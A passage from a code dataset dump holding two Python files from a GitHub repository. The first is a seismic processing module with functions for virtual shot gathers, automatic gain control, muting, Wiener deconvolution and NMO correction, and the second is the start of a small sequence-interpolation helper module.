mp_crosscorr.py.\r\n\r\n Parameters\r\n ----------\r\n path_base : str\r\n Path to the raw data.\r\n path_saved : str\r\n Path to the results of the illumination analysis.\r\n path_info : str\r\n Path to the coordinate information.\r\n mtr_station : str\r\n Station number of station used as master trace in the illumination \r\n analysis.\r\n component : str\r\n Component used for the illumination analysis.\r\n window_length : float\r\n Window length of the noise panels.\r\n vel_cut : float\r\n Minimum apparent velocity used to select noise panels.\r\n print_progress : float, optional\r\n Whether or not to print the progress of the function. \r\n The default is True.\r\n return_stream : str, optional\r\n Which virtual shot gathers to return. Can be the line identifiers ('0' \r\n or '1') or 'all'. All information is always saved. The default is None.\r\n\r\n Returns\r\n -------\r\n results : list\r\n A list containing a stream for every virtual shot location.\r\n\r\n \"\"\"\r\n # Extract the results of the illumination analysis\r\n start_time, __, dom_slow0, dom_slow1 = extract_results(path_saved, mtr_station, component, path_info)\r\n \r\n # Select only the panels with the right slowness\r\n mask = select_panels(dom_slow0, dom_slow1, vel_cut, method=method)\r\n \r\n # Set up coordinate info\r\n crd = Coords(path_info)\r\n \r\n times_sel = convert_date(start_time[mask],'obspy')\r\n dom_slow = np.stack([dom_slow0, dom_slow1]).swapaxes(0,1)\r\n dom_slow_sel = dom_slow[mask,:]\r\n \r\n # Get the line identifiers of each station\r\n line_id = crd.line_id\r\n # line_id = open_line_id(path_info)\r\n \r\n # Read one file to get some information\r\n record = obspy.read(glob.glob(os.path.join(path_base,'*','*.mseed'))[0])\r\n \r\n # Initiate arrays for every virtual shot gather and each line\r\n virt_shots = [np.zeros([np.sum(line_id==0),np.sum(line_id==0),int(record[0].stats.sampling_rate*window_length+1)]),\r\n np.zeros([np.sum(line_id==1),np.sum(line_id==1),int(record[0].stats.sampling_rate*window_length+1)])]\r\n \r\n # Get every data folder of the raw data\r\n folder_list = glob.glob(os.path.join(path_base,'*'))\r\n \r\n if print_progress:\r\n # Initialise the progress counter\r\n counter = 0\r\n print(f\"Progress:\\n0/{len(times_sel)}\\t0/{len(line_id)}\",end='')\r\n \r\n # Now go through each folder\r\n for folder in folder_list:\r\n \r\n # And each data file in the folder\r\n file_list = glob.glob(os.path.join(folder,f'*.{component}.mseed'))\r\n for file in file_list:\r\n \r\n # Now get the start time of each selected panel that falls within\r\n # this file\r\n mask_chunk = times_mask(times_sel,os.path.split(file)[-1])\r\n # Get the slowness of each panel in this file\r\n slows = dom_slow_sel[mask_chunk,:]\r\n times_chunk = times_sel[mask_chunk]\r\n \r\n # If there are no times selected, skip this file\r\n if len(times_chunk) == 0:\r\n continue\r\n \r\n # Now read the file\r\n record = obspy.read(file)\r\n # And attach the line identifiers to the record\r\n record = crd.attach_coords(record)\r\n # record = attach_line(record,path_info)\r\n \r\n # Go over each panel in the file\r\n for i,panel in enumerate(get_panel(record,times_chunk,window_length)):\r\n \r\n # Normalise the panel\r\n panel = normalise_section(panel)\r\n \r\n # Now take every receiver location and use it as a master trace\r\n # to get virtual shot locations\r\n for j,master_trace in enumerate(panel):\r\n \r\n # Find on which line this location lies\r\n line = master_trace.stats.location\r\n # And the name of the master trace station\r\n mtr_stat = master_trace.stats.station\r\n \r\n # Take only the traces that belong to the same line\r\n panel_sel = crd.line_stream(panel,line)\r\n # panel_sel = select_line(panel,line,path_info)\r\n \r\n # Find the index of the master trace\r\n for idx,trace in enumerate(panel_sel):\r\n if trace.stats.station == mtr_stat:\r\n new_j = idx\r\n break\r\n \r\n # Croscorrelate each trace in the panel with the master \r\n # trace\r\n record_corr = obspy.Stream()\r\n for trace in panel_sel:\r\n trace_corr = cross_corr(master_trace, trace)\r\n record_corr += trace_corr\r\n \r\n # Attach the distance to the virtual shot location to each\r\n # trace\r\n record_corr = crd.attach_distances(record_corr, line, mtr_idx = new_j)\r\n # record_corr = attach_distances(record_corr, new_j, line, path_info)\r\n \r\n # Now apply TRBI by taking the time-reversed acausal part \r\n # or the causal part on each side of the virtual shot \r\n # location depending on the sign of the slowness\r\n add_line = flip_shot(record_corr,slows[i,int(line)])\r\n \r\n # Now add the result to the stack for this virtual shot\r\n # location\r\n virt_shots[int(line)][new_j,:,:] += np.array(add_line)\r\n \r\n if print_progress:\r\n print(f\"\\r{counter}/{len(times_sel)}\\t{j}/{len(record)} \",end='')\r\n \r\n if print_progress:\r\n counter += 1\r\n print(f\"\\r{counter+1}/{len(times_sel)}\\t{j+1}/{len(record)} \",end='')\r\n \r\n if print_progress:\r\n print(\"Saving...\")\r\n \r\n if return_stream == 'all':\r\n results = []\r\n \r\n # Now go over each line and save each virtual shot gather as an .mseed file\r\n lines = crd.lines\r\n # lines = get_unique_lines(path_info)\r\n for line in lines:\r\n \r\n # First convert the virtual shot data to a stream\r\n streams = convert_shotdata(virt_shots[int(line)], record, line, path_info)\r\n # Then save the virtual shot streams as .mseed files\r\n save_shotdata(path_saved,streams,line)\r\n \r\n if return_stream == line:\r\n results = streams\r\n elif return_stream == 'all':\r\n results.append(streams)\r\n \r\n print(f'\\rSaved line {line}', end='')\r\n return results\r\n \r\n\r\ndef AGC_scaling_val(window, type_scal):\r\n \"\"\"\r\n Return the value with which to scale the data for AGC, see the function\r\n AGC for more information. This function calculates a separate value for each\r\n trace in the stream. Mirrors the SeisSpace ProMax AGC function. Determines\r\n some kind of average for the data and returns the inverse. There are\r\n three methods:\r\n mean:\r\n Uses the mean of the absolute amplitudes of each trace\r\n median:\r\n Uses the median of the absolute amplitudes of each trace\r\n RMS:\r\n Uses the rms amplitude of each trace.\r\n\r\n Parameters\r\n ----------\r\n window : obspy Stream\r\n Stream object that contains the traces.\r\n type_scal : str\r\n The type of scaling to use. Can be 'mean', 'median' or 'RMS'\r\n\r\n Returns\r\n -------\r\n float\r\n Inverse of the selected kind of average to scale the data with.\r\n\r\n \"\"\"\r\n # First takes the absolute values of the data\r\n data = abs(stream_to_array(window))\r\n \r\n # Then determine the right kind of average\r\n if type_scal == 'mean':\r\n return 1/np.mean(data,axis=1)\r\n elif type_scal == 'median':\r\n return 1/np.median(data,axis=1)\r\n elif type_scal == 'RMS':\r\n mean_square = np.mean(np.square(data), axis=1)\r\n return 1/np.sqrt(mean_square)\r\n\r\ndef get_AGC_window(trace, oper_len, basis):\r\n \"\"\"\r\n Generator function that gives the window for the AGC function. Streams are\r\n assumed to all contain traces with the same duration in time and sampling\r\n rate. For each sample, a window is created. The length of the window is set.\r\n The time window can then be located at three different positions compared \r\n to the sample:\r\n trailing:\r\n Window starts at the sample\r\n leading:\r\n Window ends at the sample\r\n centred:\r\n Sample is located at the middle of the sample\r\n At the start or end, the length of the window can be shorter to accommodate\r\n the lack of data at the edges of the record.\r\n\r\n Parameters\r\n ----------\r\n trace : obspy Stream or obspy Trace\r\n The data for which the window has to be given.\r\n oper_len : float\r\n Length of the window in seconds.\r\n basis : str\r\n Indicates how the window is located around the sample location. Can be\r\n 'trailing', 'leading' or 'centred'.\r\n\r\n Yields\r\n ------\r\n obspy Stream\r\n The window to be used for the AGC.\r\n\r\n \"\"\"\r\n # Depending on if the input is a trace or stream, the information is gotten\r\n # from a different location\r\n if isinstance(trace,obspy.Trace):\r\n time_start = trace.stats.starttime\r\n dt = trace.stats.delta\r\n amt_samples = trace.stats.npts\r\n elif isinstance(trace, obspy.Stream):\r\n time_start = trace[0].stats.starttime\r\n dt = trace[0].stats.delta\r\n amt_samples = trace[0].stats.npts\r\n \r\n # With the index for each sample, the window is given\r\n for sample_idx in range(amt_samples):\r\n if basis == 'trailing':\r\n yield trace.slice(starttime=time_start+dt*sample_idx,\r\n endtime=time_start+oper_len+dt*sample_idx)\r\n elif basis == 'leading':\r\n yield trace.slice(starttime=time_start-oper_len+dt*sample_idx,\r\n endtime=time_start+dt*sample_idx)\r\n elif basis == 'centred':\r\n yield trace.slice(starttime=time_start-0.5*oper_len+dt*sample_idx,\r\n endtime=time_start+0.5*oper_len+dt*sample_idx)\r\n\r\ndef AGC_trace(trace, oper_len, type_scal, basis):\r\n \"\"\"\r\n Apply AGC to a single trace. For more information see the function AGC.\r\n\r\n Parameters\r\n ----------\r\n trace : obspy.core.Trace\r\n Input trace.\r\n oper_len : float\r\n The length of the AGC window in seconds.\r\n type_scal : str\r\n Which type of scaling is used on the data. Can be 'mean', 'median' or\r\n 'RMS'\r\n basis : str\r\n Location of the window compared to each sample. Can be 'trailing', \r\n 'leading', 'centred'.\r\n\r\n Returns\r\n -------\r\n trace : obspy.core.Trace\r\n Trace balanced with AGC.\r\n\r\n \"\"\"\r\n # Create a copy of the trace\r\n new_trace = trace.copy()\r\n \r\n # Go over each AGC window\r\n for i,window in enumerate(get_AGC_window(trace, oper_len, basis)):\r\n # Get the gain scaling\r\n scalar = AGC_scaling_val(window, type_scal)\r\n new_trace.data[i] = trace[i]*scalar\r\n return trace\r\n\r\ndef AGC_old(record, oper_len, type_scal, basis):\r\n \"\"\"\r\n Automatic Gain Control balances the gain based on the amplitude in a local\r\n window. The function is based on the AGC function from SeisSpace ProMAX. \r\n Scaling can be done based on the inverse of:\r\n mean\r\n median\r\n RMS \r\n The location of the window can be set as:\r\n trailing:\r\n Following the sample\r\n leading:\r\n Preceding the sample\r\n centred:\r\n The sample is located at the centre of the window\r\n \r\n See also:\r\n https://esd.halliburton.com/support/LSM/GGT/ProMAXSuite/ProMAX/5000/5000_8/Help/promax/agc.pdf\r\n\r\n Parameters\r\n ----------\r\n record : obspy Stream\r\n The record that has to be balanced.\r\n oper_len : float\r\n Window length in seconds.\r\n type_scal : str\r\n Which type of scaling is used on the data. Can be 'mean', 'median' or\r\n 'RMS'\r\n basis : str\r\n Location of the window compared to each sample. Can be 'trailing', \r\n 'leading', 'centred'.\r\n\r\n Returns\r\n -------\r\n new_record : obspy Stream\r\n The new record after application of AGC.\r\n\r\n \"\"\"\r\n # Create a copy of the original data\r\n new_record = record.copy()\r\n # Get the data as an array\r\n data = stream_to_array(record)\r\n \r\n # Go over each sample and create the window\r\n for i,window in enumerate(get_AGC_window(record, oper_len, basis)):\r\n # Get the scaling value for each trace\r\n scalars = AGC_scaling_val(window, type_scal)\r\n # Multiply the data with the scalars\r\n data[:,i] *= scalars\r\n \r\n # Now add the new data to the record\r\n for i,trace in enumerate(new_record):\r\n trace.data = data[i,:]\r\n \r\n return new_record\r\n\r\ndef AGC(record,oper_len,type_scal,basis):\r\n \"\"\"\r\n Automatic Gain Control balances the gain based on the amplitude in a local\r\n window. The function is based on the AGC function from SeisSpace ProMAX. \r\n Scaling can be done based on the inverse of:\r\n mean\r\n median\r\n RMS \r\n The location of the window can be set as:\r\n trailing:\r\n Following the sample\r\n leading:\r\n Preceding the sample\r\n centred:\r\n The sample is located at the centre of the window\r\n \r\n See also:\r\n https://esd.halliburton.com/support/LSM/GGT/ProMAXSuite/ProMAX/5000/5000_8/Help/promax/agc.pdf\r\n\r\n Parameters\r\n ----------\r\n record : obspy Stream\r\n The record that has to be balanced.\r\n oper_len : float\r\n Window length in seconds.\r\n type_scal : str\r\n Which type of scaling is used on the data. Can be 'mean', 'median' or\r\n 'RMS'\r\n basis : str\r\n Location of the window compared to each sample. Can be 'trailing', \r\n 'leading', 'centred'.\r\n\r\n Returns\r\n -------\r\n new_record : obspy Stream\r\n The new record after application of AGC.\r\n\r\n \"\"\"\r\n # XXX Faster methods have not yet been implemented for the other means, so \r\n # they use the old function \r\n if type_scal in ['median','RMS']:\r\n return AGC_old(record,oper_len,type_scal,basis)\r\n \r\n dt = record[0].stats.delta\r\n # The operator length in amount of data points\r\n oper_len_items = int(np.round(oper_len/dt+1))\r\n \r\n new_record = record.copy()\r\n \r\n # The convolution operator for the mean\r\n operator = np.ones(oper_len_items)\r\n \r\n # Convert the data to an array\r\n data = stream_to_array(record)\r\n \r\n # Calculate how many data points are used for each point\r\n scal_vals = np.convolve(np.ones(data.shape[1]),operator,'full')\r\n \r\n # Convolve the data with the operator and divide by the amount of points\r\n # used to get the mean\r\n convolve = convolve2d(abs(data),operator[np.newaxis,:],'full')/scal_vals[np.newaxis,:]\r\n \r\n convolve = np.where(convolve==0,1,convolve)\r\n \r\n # Now snip out the relevant part for each method\r\n if basis == 'trailing':\r\n snipped = 1/convolve[:,oper_len_items-1:]\r\n elif basis == 'leading':\r\n snipped = 1/convolve[:,:-oper_len_items+1]\r\n elif basis == 'centred':\r\n snipped = 1/convolve[:,int(oper_len_items/2):int(-oper_len_items/2)]\r\n \r\n # Multiply the data with the scaling values\r\n data *= snipped\r\n \r\n # Now add the new data to the record\r\n for i,trace in enumerate(new_record):\r\n trace.data = data[i,:]\r\n \r\n return new_record\r\n\r\ndef TAR_trace(trace, power_constant):\r\n \"\"\"\r\n TAR function that works on a single trace. For more information see the \r\n function TAR.\r\n\r\n Parameters\r\n ----------\r\n trace : obspy Trace\r\n Input trace.\r\n power_constant : float\r\n Power constant for time raised to a power gain correction.\r\n\r\n Returns\r\n -------\r\n new_trace : obspy Trace\r\n Output trace.\r\n\r\n \"\"\"\r\n # Create a copy of the trace\r\n new_trace = trace.copy()\r\n \r\n # Get the gain corrections\r\n pow_mult = trace.times()**power_constant\r\n # Apply it to the new trace\r\n new_trace.data = trace.data*pow_mult\r\n \r\n return new_trace\r\n\r\ndef TAR(record, power_constant):\r\n \"\"\"\r\n Apply a very basic version of True Amplitude Recovery to a section. Based\r\n on the TAR function in SeisSpace ProMAX. A gain correction is applied to \r\n the data as time raised to a power:\r\n g(t)=t^power_constant\r\n \r\n See also:\r\n https://esd.halliburton.com/support/LSM/GGT/ProMAXSuite/ProMAX/5000/5000_8/Help/promax/tar.pdf\r\n\r\n Parameters\r\n ----------\r\n record : obspy Stream\r\n Stream of input data.\r\n power_constant : float\r\n Power constant to which the time is raised for the gain correction.\r\n\r\n Returns\r\n -------\r\n new_record : obspy Stream\r\n Stream with TAR applied.\r\n\r\n \"\"\"\r\n # Create a new record\r\n new_record = record.copy()\r\n \r\n # Get the gain correction for each time\r\n pow_mult = record[0].times()**power_constant\r\n \r\n # Multiply this with the data\r\n data = stream_to_array(record)\r\n data = data*pow_mult[np.newaxis,:]\r\n \r\n # Now attach the information to each trace\r\n for i,trace in enumerate(new_record):\r\n trace.data = data[i,:]\r\n return new_record\r\n \r\ndef ramp_func(len_ramp,idx_ramp,len_data):\r\n \"\"\"\r\n A ramp function where the ramp has a specified length, is centred around\r\n a specific position and the full array has a specified length.\r\n\r\n Parameters\r\n ----------\r\n len_ramp : int\r\n In how many elements of the array the function increases from 0 to 1.\r\n idx_ramp : int\r\n At which position the ramp part is found. The index indicates the \r\n centre of the ramp.\r\n len_data : int\r\n The length of the total array.\r\n\r\n Returns\r\n -------\r\n mult : np.ndarray\r\n The resulting ramp function.\r\n\r\n \"\"\"\r\n # The ramp part\r\n ramp = np.linspace(0,1,len_ramp)\r\n # The total function\r\n mult = np.zeros(len_data)\r\n \r\n # Find the index at which the ramp starts and ends\r\n idx_start = int(max(0,idx_ramp-0.5*len_ramp))\r\n idx_end = int(min(len_data,idx_ramp+0.5*len_ramp))\r\n \r\n # If the ramp is not fully included (because it goes over the edge of the\r\n # function), we want to include only part of ramp. Find the right index\r\n # for this\r\n idx_start_ramp = max(0,int(-(idx_ramp-0.5*len_ramp)))\r\n idx_end_ramp = min(len(ramp),int(len_data - idx_ramp+0.5*len_ramp))\r\n \r\n # Include the ramp part in the function\r\n mult[idx_start:idx_end] = ramp[idx_start_ramp:idx_end_ramp]\r\n # Set the rest to zero\r\n mult[idx_end:] = 1\r\n \r\n return mult\r\n\r\ndef logistic_func(len_ramp,idx_ramp,len_data):\r\n \"\"\"\r\n A logistic function that has asymptotes 0 and 1, and its maximum slope at\r\n the specified index location. The length of the array is also determined.\r\n\r\n Parameters\r\n ----------\r\n len_ramp : int\r\n A rough indication of how quickly the function increases around the \r\n maximum slope. Is made to mimic the ramp function in ramp_func.\r\n idx_ramp : int\r\n At what index the maximum slope (or where the second derivative is 0)\r\n can be found.\r\n len_data : int\r\n The total length of the resulting array.\r\n\r\n Returns\r\n -------\r\n act_func : np.ndarray\r\n An array of the specified length that contains the logistic function.\r\n\r\n \"\"\"\r\n # Values on the x-axis\r\n x_vals = np.linspace(1,len_data,len_data)\r\n # Logistic function with correctly scaled ramp\r\n act_func = 1/(1+np.exp(-(x_vals-idx_ramp)/(0.33*len_ramp)))\r\n \r\n return act_func\r\n\r\ndef trace_mute(data,method,idx_cut,len_ramp = None):\r\n \"\"\"\r\n Apply a top mute to a trace at the specified index with a certain function.\r\n This can be a step function, ramp function or sigmoid.\r\n\r\n Parameters\r\n ----------\r\n data : np.ndarray\r\n Array containing the data of the trace.\r\n method : str\r\n With which function to apply the top mute. Can be:\r\n step\r\n ramp - Index determines the middle of the ramp\r\n sigmoid - Index determines the highest slope of the function\r\n (where the second derivative is zero)\r\n idx_cut : int\r\n At which index to start the data. The ramp and sigmoid functions \r\n surround this location\r\n len_ramp : int, optional\r\n Length of the ramp in the ramp function in elements of the array. The \r\n sigmoid function will be similar to the ramp function. \r\n The default is None.\r\n\r\n Raises\r\n ------\r\n ValueError\r\n If method is neither 'step', 'ramp' nor 'sigmoid'.\r\n\r\n Returns\r\n -------\r\n np.ndarray\r\n Array containing the data with the mute applied.\r\n\r\n \"\"\"\r\n \r\n if method == 'step':\r\n # Simply take the values that are higher than the index\r\n return np.where(np.linspace(1,len(data),len(data))-1 <= idx_cut,0,data)\r\n elif method == 'ramp':\r\n # Create a ramp function with its ramp around the specified index\r\n mult = ramp_func(len_ramp,idx_cut,len(data))\r\n elif method == 'sigmoid':\r\n # Define the logistic function so that it has its maximum curvature \r\n # around the specified index and its asymptotes are 0 and 1.\r\n mult = logistic_func(len_ramp,idx_cut,len(data))\r\n else:\r\n # If none of the other methods are used, something has gone wrong\r\n raise ValueError(\"Method is not used correctly, can be 'box', 'ramp' or 'sigmoid'.\")\r\n \r\n # Multiply the data with the specified function\r\n return data*mult\r\n \r\ndef mute_cone(record,method,vel_mute,shift,len_ramp=None):\r\n \"\"\"\r\n Apply a top mute to a record in the shape of a cone around the shot location. \r\n The cone is characterised by a velocity for the angle, a shift to let it \r\n start earlier or further in the record. The mute can be applied as a step\r\n function, a ramp function or as a sigmoid.\r\n\r\n Parameters\r\n ----------\r\n record : obspy.core.stream.Stream\r\n Stream that will be muted. Distance from the shot location should be \r\n defined for each trace in trace.stats.location\r\n method : str\r\n Which method is used for the mute function. Can be:\r\n step - Use a step function\r\n ramp - Use a ramp function\r\n sigmoid - Use the logistic function\r\n vel_mute : float\r\n The velocity to use for the slope of the cone.\r\n shift : float\r\n A time shift in seconds for the whole cone. Can also be negative.\r\n len_ramp : float, optional\r\n The length of the ramp for the ramp function or a similar increase for\r\n the sigmoid function. Does not have to be provided if a step function \r\n is used. The default is None.\r\n\r\n Raises\r\n ------\r\n ValueError\r\n If len_ramp is not defined while using method 'step' or 'sigmoid'.\r\n\r\n Returns\r\n -------\r\n new_record : obspy.core.stream.Stream\r\n The input record with the top mute defined.\r\n\r\n \"\"\"\r\n # Get the time step of the data\r\n dt = record[0].stats.delta\r\n \r\n # Check if ramp is defined if method is 'ramp' or 'sigmoid'\r\n methods_ramp = ['ramp','sigmoid']\r\n if method in methods_ramp:\r\n if len_ramp == None:\r\n raise ValueError(f\"len_ramp must be defined when using the following methods: {methods_ramp}\")\r\n else:\r\n # Convert len_ramp from an amount of seconds to an index\r\n len_ramp = int(len_ramp/dt)\r\n \r\n # Get the distances from the shot location from the stream\r\n dists = []\r\n for trace in record:\r\n dists.append(trace.stats.distance)\r\n dists = abs(np.array(dists))\r\n \r\n # Calculate at what index to start the trace\r\n cut_off_idcs = np.array(dists/vel_mute/dt,dtype=int) + int(shift/dt)\r\n \r\n # Create a new stream to put the results in\r\n new_record = record.copy()\r\n for i,trace in enumerate(new_record):\r\n # To be certain, enforce a minimum and maximum index\r\n cut_off = max(0,cut_off_idcs[i])\r\n cut_off = min(len(trace)-1,cut_off)\r\n \r\n # Mute each trace by the required amount\r\n trace.data = trace_mute(trace.data,method,cut_off,len_ramp=len_ramp)\r\n return new_record\r\n\r\ndef levinson_recursion(autocorr, rhs):\r\n \"\"\"\r\n Python implementation of the Matlab CREWES function to solve system Tx=b\r\n with Levinson recursion.\r\n\r\n Parameters\r\n ----------\r\n autocorr : numpy.ndarray\r\n Input autocorrelation vector. Must be fully causal\r\n rhs : numpy.ndarray\r\n Input right-hand-side vector.\r\n\r\n Raises\r\n ------\r\n ValueError\r\n Raised if the autocorrelation does not have it's maximum value at the\r\n first index.\r\n\r\n Returns\r\n -------\r\n x : np.ndarray\r\n Solution vector.\r\n\r\n \"\"\"\r\n autocorr = autocorr.squeeze()\r\n # Test if autocorr has a single dimension\r\n if autocorr.ndim != 1:\r\n raise ValueError(\"autocorr must be a vector\")\r\n # Make it into a column vector\r\n autocorr = autocorr[:,np.newaxis]\r\n \r\n rhs = rhs.squeeze()\r\n if rhs.ndim != 1:\r\n raise ValueError(\"rhs must be a vector\")\r\n \r\n rhs = rhs[:,np.newaxis]\r\n \r\n # Normalise autocorr\r\n if autocorr[0] != 1.:\r\n autocorr = autocorr/autocorr.max()\r\n \r\n if autocorr[0] != autocorr.max():\r\n raise ValueError(\"Invalid autocorrelation, zero lag not maximum\")\r\n \r\n # Initialise\r\n a = autocorr[1:]\r\n n = len(rhs)\r\n y = np.zeros(len(a))\r\n x = np.zeros(len(rhs))\r\n z = np.zeros(len(a))\r\n \r\n y[0] = -a[0]\r\n x[0] = rhs[0]\r\n beta = 1\r\n alpha = -a[0]\r\n \r\n # Main recursion loop\r\n for k in range(1,n):\r\n beta = (1 - alpha**2)*beta\r\n beta = beta.squeeze()\r\n \r\n mu = (rhs[k] - a[:k].T.dot(x[k-1::-1]))/beta\r\n mu = mu.squeeze()\r\n \r\n nu = x[:k] + mu*y[k-1::-1]\r\n\r\n x[:k] = nu[:k]\r\n x[k] = mu\r\n \r\n if k < n-1:\r\n # print(a[:k].T.shape, y[k::-1].shape,beta.shape)\r\n alpha = -(a[k] + a[:k].T.dot(y[k-1::-1]))/beta\r\n alpha = alpha.squeeze()\r\n \r\n z[:k] = y[:k] + alpha * y[k-1::-1]\r\n y[:k] = z[:k]\r\n y[k] = alpha\r\n \r\n return x\r\n\r\ndef wiener_decon(trace,design_trace,n,stab=0.0001):\r\n \"\"\"\r\n Python implementation of Matlab CREWES Wiener deconvolution function. \r\n\r\n Parameters\r\n ----------\r\n trace : obspy.core.trace.Trace\r\n Input trace.\r\n design_trace : obspy.core.trace.Trace\r\n Trace used for operator design.\r\n n : int\r\n How many lags of the autocorrelation to use.\r\n stab : float, optional\r\n Stabilisation factor as fraction of zero-lag. The default is 0.0001.\r\n\r\n Returns\r\n -------\r\n new_trace : obspy.core.trace.Trace\r\n Deconvolved trace.\r\n\r\n \"\"\"\r\n \r\n if not isinstance(design_trace, obspy.core.trace.Trace):\r\n raise ValueError(f\"Design trace is not a trace but {type(design_trace)}\")\r\n \r\n # autocorr_raw = th.TauP.cross_corr(design_trace,design_trace)\r\n autocorr_raw = np.correlate(design_trace,design_trace,mode='full')\r\n # Take causal part and right lag\r\n halfway = int(len(autocorr_raw)/2)\r\n autocorr = autocorr_raw[halfway:halfway+n]\r\n \r\n # Stabilise the autocorrelation\r\n autocorr[0] = autocorr[0]*(1+stab)\r\n autocorr = autocorr / autocorr[0]\r\n \r\n # Generate right-hand-side \r\n rhs = np.zeros(len(autocorr))\r\n rhs[0] = 1.\r\n \r\n x = levinson_recursion(autocorr, rhs)\r\n x /= np.sqrt(x.T.dot(x))\r\n \r\n new_trace = obspy.Trace()\r\n new_trace.data = np.convolve(trace,x)[:int(-n+1)]\r\n new_trace.stats = trace.stats\r\n new_trace = normalise_trace(new_trace)\r\n return new_trace\r\n\r\ndef wiener_decon_stream(record,design_id,n):\r\n \"\"\"\r\n The Wiener deconvolution applied to every trace in a stream. The design \r\n trace can be set to one of the traces in the stream, a provided trace or \r\n each trace uses itself. \r\n\r\n Parameters\r\n ----------\r\n record : obspy.core.Stream\r\n The stream on which Wiener deconvolution is applied.\r\n design_id : int or obspy.core.Trace or str\r\n There are three options:\r\n 'all' - each trace uses itself as a design trace\r\n int - the trace at the provided index in the stream is used as a \r\n design trace\r\n Trace - a separate trace is provided as the design trace\r\n n : int\r\n How many lags of the autocorrelation to use.\r\n\r\n Returns\r\n -------\r\n new_stream : obspy.core.stream.Stream\r\n The deconvolved stream.\r\n\r\n \"\"\"\r\n \r\n # Initiate a new stream to put the results in\r\n new_stream = obspy.Stream()\r\n \r\n # If every trace uses itself as design trace\r\n if design_id == 'all':\r\n # use the trace as the second argument\r\n for trace in record:\r\n new_stream += wiener_decon(trace,trace,n)\r\n return new_stream\r\n \r\n # If the design trace is indicated as an index, get the right trace out of \r\n # the stream\r\n if isinstance(design_id,int):\r\n design_trace = record[design_id].copy()\r\n \r\n # Deconvolve each trace with the design trace\r\n for trace in record:\r\n new_stream += wiener_decon(trace, design_trace, n)\r\n \r\n return new_stream\r\n\r\ndef NMO_corr(record,vel):\r\n \"\"\"\r\n Apply an NMO correction on a record. The distance from the midpoint \r\n (offset) must be defined on each trace as trace.stats.distance. The shot\r\n time is assumed to be at 0.0 s. The NMO variation is then:\r\n T(x) - t_0 = sqrt(x^2/v^2 + t_0^2) - t_0,\r\n where t_0 is the vertical two-way time, v is the rms velocity and x the \r\n offset. \r\n vel can be a single velocity or a velocity model for every time \r\n step in the record.\r\n\r\n Parameters\r\n ----------\r\n record : obspy.core.stream.Stream\r\n Stream on which the NMO correction is applied. Offset must be defined\r\n for every trace at trace.stats.distance\r\n vel : float or np.ndarray\r\n [m/s] Either a single value or an array with a velocity value for every \r\n time step in the record.\r\n\r\n Returns\r\n -------\r\n shift_data : np.ndarray\r\n [amt of time steps, amt of traces] NMO corrected data array. \r\n To recreate the stream, use the function recreate_stream\r\n\r\n \"\"\"\r\n # Create an array with all vertical two-way travel times\r\n times = record[0].times()[:,np.newaxis]\r\n \r\n # Make a column vector of the velocity array to broadcast with the time \r\n # array\r\n if isinstance(vel,np.ndarray) and vel.ndim == 1:\r\n vel = vel[:,np.newaxis]\r\n \r\n # Get all offsets\r\n dists = []\r\n for trace in record:\r\n dists.append(trace.stats.distance)\r\n # And make an array from it\r\n dists = np.array(dists)[np.newaxis,:]\r\n dt = record[0].stats.delta\r\n \r\n # Now we create two index masks so that the index along the normal move-out\r\n # line is taken\r\n \r\n # First the time index is taken, calculated as the normal move-out at each\r\n # offset provided for each vertical two-way time with the velocity that \r\n # belongs to each time.\r\n idx_time = np.round(( np.sqrt(np.square(dists) / np.square(vel) + np.square(times)) ) / dt).astype(int)\r\n \r\n # Where the index is higher than the actual list of times, zeroes should be\r\n # added instead\r\n mask_zeroes = np.where(idx_time >= len(times), True, False)\r\n \r\n # For the index, a placeholder is used in the meanwhile\r\n idx_time[mask_zeroes] = len(times)-1\r\n\r\n # The second index is just the index of each trace in the stream, repeated\r\n # repeated for each time value \r\n idx_space = (np.linspace(0,len(record)-1,len(record))[np.newaxis,:] + np.zeros(len(times))[:,np.newaxis]).astype(int)\r\n \r\n # Convert the record into an array with the data\r\n data = stream_to_array(record)\r\n \r\n # Index the data at the specified positions to get the NMO corrected data\r\n shift_data = data[idx_space,idx_time]\r\n # Insert zeroes at the right positions\r\n shift_data[mask_zeroes] = 0\r\n \r\n return shift_data","repo_name":"shwhassing/thesis_functions","sub_path":"thesis_functions/proc.py","file_name":"proc.py","file_ext":"py","file_size_in_byte":56151,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"19945836118","text":"## @file SeqServices.py\n# @title SeqServices\n# @author Lawrence Chung\n# @brief Sequence operations\n\n\n## @brief determines whether sequence is ascending\n# @param X a sequence in the form of a list\n# @return boolean, true if ascending, false if not\ndef isAscending(X):\n\tj = 0\n\ti = 0\n\twhile(j < len(X)-1):\n\t\tif(X[j+1] >= X[j]):\n\t\t\ti += 1\n\t\tj += 1\n\tif(i == len(X)-1):\n\t\treturn True\n\telse:\n\t\treturn False\n\n## @brief determines if input value is in sequence\n# @param X a Sequence of values \n# @param x value to be checked\n# return boolean, True if in bounds, False if not\ndef isInBounds(X, x):\n\tif(x < X[0] or x > X[len(X)-1]):\n\t\treturn False\n\telse:\n\t\treturn True\n\n## @brief linear interpolation\n# @details Determines the corresponding y using formula\n# @param x1 independent variable of first set of poitns\n# @param y1 dependent variable of first set of points\n# @param x2 independent variable of second set of points\n# @param y2 dependent variable of second set of points\n# @param x the x value that will be interpolated\n# @return the y value determined through interpolation\ndef interpLin(x1, y1, x2, y2, x):\n\ttempVal = (y2 - y1)/(x2 - x1)\n\tval = tempVal*(x - x1) + y1\n\treturn val\n\n## @brief Quadratic interpolation\n# @details Determines the corresponding y using formula\n# @param x0 independent variable of first set of poitns\n# @param y0 dependent variable of first set of points\n# @param x1 independent variable of second set of points\n# @param y1 dependent variable of second set of points\n# @param x2 independent variable of third set of points\n# @param y2 dependent variable of third set of points\n# @param x the x value that will be interpolated\n# @return the y value determined through interpolation\ndef interpQuad(x0, y0, x1, y1, x2, y2, x):\n\ttempVal = ((y2 - y0)/(x2- x0))*(x - x1)\n\ttempVal2 = ((y2 - 2*y1 + y0)/(2*(x2-x1)**2))*(x-x1)**2\n\tval = y1 + tempVal + tempVal2\n\treturn val\n\n## @brief Determines index of value in sequence\n# @param X A sequence of x values\n# @param x a value in Sequence X\n# @return the index of the x value\ndef index(X, x):\n\tif(isInBounds(X,x) and isAscending(X)):\n\t\ti = 0\n\t\twhile(i < len(X)):\n\t\t\tif(X[i] == x):\n\t\t\t\treturn i\n\t\t\ti += 